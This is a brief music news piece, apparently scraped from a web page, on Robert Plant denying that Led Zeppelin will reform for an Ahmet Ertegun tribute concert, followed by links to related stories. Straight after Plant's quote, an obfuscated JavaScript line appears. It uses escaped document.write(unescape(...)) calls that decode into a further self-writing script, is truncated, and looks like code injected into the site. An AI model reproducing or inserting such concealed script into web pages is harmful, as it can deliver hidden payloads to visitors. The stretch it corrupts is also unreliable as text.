Led Zeppelin have no plans to reform, singer Robert Plant has insisted.
The legendary hard rock band were at the centre of press speculation last week, connecting them with a rare return to the live stage.
Robert Plant, Jimmy Page and John Paul Jones, minus drummer John Bonham, who died in 1980, were said to be in talks to play a special gig in London.
The concert was reported to be a one-off tribute for Atlantic Records founder Ahmet Ertegun, who died in December last year.
However, singer Plant now appears to have scotched plan for the comeback, commenting: "If there was one, then there wouldn't be enough doctors to support it!"document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
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1 | Led Zepplin go ahead without Plant Its official Led Zeppelin are to tour without their curly haired frontman.The band are currently auditioning frontmen to replace Robert Plant before … | October 28, 2008 | |
2 | Led Zepplin Montreux Concerts book published Formidable publisher and record label, Crossfire Records, who has some ambitious new releases lined-up for Spring 2007. Crossfire, who has blazed … | April 10, 2007 |